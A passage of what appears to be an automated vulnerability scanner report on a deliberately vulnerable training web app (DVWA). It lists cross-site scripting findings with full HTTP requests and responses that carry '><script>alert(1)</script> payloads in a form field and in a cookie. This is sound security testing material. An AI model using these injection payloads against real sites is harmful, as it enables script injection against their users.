X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Stored Cross Site Scripting (XSS) :: Damn Vulnerable Web
...[SNIP]...
<br />Message: RUYsQwuktj6<script>alert(1)</script>hl02e<br />
...[SNIP]...
5.9. https://pentest-ground.com:4280/vulnerabilities/xss_s/ [txtName parameter]
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_s/ |
Issue detail
The value of the txtName request parameter is copied into the HTML document as plain text between tags. The payload iziqe<script>alert(1)</script>pakxd was submitted in the txtName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request 1
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=16ff6ee57a3573627a06d679b10aae63
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_s/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 55
txtName=RUYsQwiziqe%3cscript%3ealert(1)%3c%2fscript%3epakxd&mtxMessage=RUYsQw&btnSign=Sign+Guestbook
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:40:06 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5066
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Stored Cross Site Scripting (XSS) :: Damn Vulnerable Web
...[SNIP]...
<div id="guestbook_comments">Name: RUYsQwiziqe<script>alert(1)</script>pakxd<br />
...[SNIP]...
5.10. https://pentest-ground.com:4280/vulnerabilities/brute/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/brute/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload iqjdu'><script>alert(1)</script>li3eu was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/brute/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowiqjdu'%3e%3cscript%3ealert(1)%3c%2fscript%3eli3eu; PHPSESSID=72abe663667a4505362110ff551e5951
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:30 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4320
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Brute Force :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=brute&security=lowiqjdu'><script>alert(1)</script>li3eu&locale=en' )">
...[SNIP]...
5.11. https://pentest-ground.com:4280/vulnerabilities/captcha/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/captcha/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload yuiyc'><script>alert(1)</script>g1dgt was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/captcha/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowyuiyc'%3e%3cscript%3ealert(1)%3c%2fscript%3eg1dgt; PHPSESSID=fafc6e93252383617a2b63515a784879
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:55:42 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4973
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Insecure CAPTCHA :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=captcha&security=lowyuiyc'><script>alert(1)</script>g1dgt&locale=en' )">
...[SNIP]...
5.12. https://pentest-ground.com:4280/vulnerabilities/csp/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload h29za'><script>alert(1)</script>lceqlywg0hz was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/csp/?include=WvEMlU HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowh29za'%3e%3cscript%3ealert(1)%3c%2fscript%3elceqlywg0hz; PHPSESSID=ca8657160a0751a2610b487fcc2f6090
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:41 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4357
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self';
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=csp&security=lowh29za'><script>alert(1)</script>lceqlywg0hz&locale=en' )">
...[SNIP]...
5.13. https://pentest-ground.com:4280/vulnerabilities/csrf/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csrf/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload lpaci'><script>alert(1)</script>km2m9 was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/csrf/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowlpaci'%3e%3cscript%3ealert(1)%3c%2fscript%3ekm2m9; PHPSESSID=98ee9b9a0d183d8d3d0bb32deb3985c7
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:38 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5630
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Cross Site Request Forgery (CSRF) :: Damn Vulnerable Web
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=csrf&security=lowlpaci'><script>alert(1)</script>km2m9&locale=en' )">
...[SNIP]...
5.14. https://pentest-ground.com:4280/vulnerabilities/exec/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/exec/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload wz64m'><script>alert(1)</script>znkdthk4l5x was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/exec/?ip=CcwtLI&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowwz64m'%3e%3cscript%3ealert(1)%3c%2fscript%3eznkdthk4l5x; PHPSESSID=c3542eacecd4a8e09b464f5975c19eb3
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/exec/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:53:35 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4271
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Command Injection :: Damn Vulnerable Web Application (DVW
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=exec&security=lowwz64m'><script>alert(1)</script>znkdthk4l5x&locale=en' )">
...[SNIP]...
5.15. https://pentest-ground.com:4280/vulnerabilities/fi/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload yz6yk'><script>alert(1)</script>mc6n8 was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/fi/?page=file1.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowyz6yk'%3e%3cscript%3ealert(1)%3c%2fscript%3emc6n8; PHPSESSID=40e1f5a6d819e8ffc29608da8a559c07
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:15 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4175
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=fi&security=lowyz6yk'><script>alert(1)</script>mc6n8&locale=en' )">
...[SNIP]...
5.16. https://pentest-ground.com:4280/vulnerabilities/javascript/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/javascript/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload vmx7k'><script>alert(1)</script>pi7ckd12oyb was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/javascript/?token=8b479aefbd90795395b3e7089ae0dc09&phrase=ChangeMe&send=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowvmx7k'%3e%3cscript%3ealert(1)%3c%2fscript%3epi7ckd12oyb; PHPSESSID=6e6a7523219fb665633f9393ffa391c8
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/javascript/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:49 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4241
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: JavaScript Attacks :: Damn Vulnerable Web Application (DV
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=javascript&security=lowvmx7k'><script>alert(1)</script>pi7ckd12oyb&locale=en' )">
...[SNIP]...
5.17. https://pentest-ground.com:4280/vulnerabilities/open_redirect/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload g07bn'><script>alert(1)</script>xycmf was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/open_redirect/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowg07bn'%3e%3cscript%3ealert(1)%3c%2fscript%3exycmf; PHPSESSID=34b665b57f17eb6f13041213e5ff7700
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:53:51 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4312
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=open_redirect&security=lowg07bn'><script>alert(1)</script>xycmf&locale=en' )">
...[SNIP]...
5.18. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/source/info.php |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload nh2ex'><script>alert(1)</script>mad2h was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/open_redirect/source/info.php?id=2 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lownh2ex'%3e%3cscript%3ealert(1)%3c%2fscript%3emad2h; PHPSESSID=f079d932222ae8e5723af3687b12a613
Upgrade-Insecure-Requests: 1
Referer: http://0b9b24ea-7401-4f4a-b8b4-39f9a8f53c9f.com/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:19 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4274
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../../vulnerabilities/view_help.php?id=open_redirect&security=lownh2ex'><script>alert(1)</script>mad2h&locale=en' )">
...[SNIP]...
5.19. https://pentest-ground.com:4280/vulnerabilities/sqli/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload xkmte'><script>alert(1)</script>lbkz3 was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
Request 1
GET /vulnerabilities/sqli/?id=946146&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowxkmte'%3e%3cscript%3ealert(1)%3c%2fscript%3elbkz3; PHPSESSID=21775aa7d09a4979abf3a2808b744447
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:50:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5103
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Warning</b>: Undefined array key "user_token" in <b>/var/www/html/vulnerabilities/sqli/source/impossible.php</b> on line <b>5</b><br />
<br />
<b>Warning</b>: Cannot modify header informat
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=sqli&security=lowxkmte'><script>alert(1)</script>lbkz3&locale=en' )">
...[SNIP]...
5.20. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/ [security cookie]
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli_blind/ |
Issue detail
The value of the security cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8d42'><script>alert(1)</script>fgv4p was submitted in the security cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.
